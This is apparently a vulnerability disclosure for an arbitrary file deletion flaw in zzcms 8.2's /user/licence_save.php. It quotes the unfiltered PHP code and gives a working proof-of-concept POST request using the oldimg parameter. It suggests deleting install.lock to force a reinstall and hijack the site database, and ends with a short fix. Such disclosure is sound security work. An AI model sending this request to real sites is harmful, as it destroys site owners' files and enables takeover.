| title | tags | grammar_cjkRuby | |
|---|---|---|---|
licence_save.php |
|
true |
user/licence_save.php
Edition :
zzcms 8.2
Location
/user/licence_save.php
Code:
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
$f="../".$oldimg;
if (file_exists($f)){
unlink($f);
}
$fs="../".str_replace(".","_small.",$oldimg)."";
if (file_exists($fs)){
unlink($fs);
}
}Rows : 31
Harm
Allows attackers to delete files arbitrarily
Cause the cause
Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering
first create test.php
Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"
Then execute
Then find test.php is gone
poc
GET:
http://127.0.0.1:8080/user/licence_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.
Solution
Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes




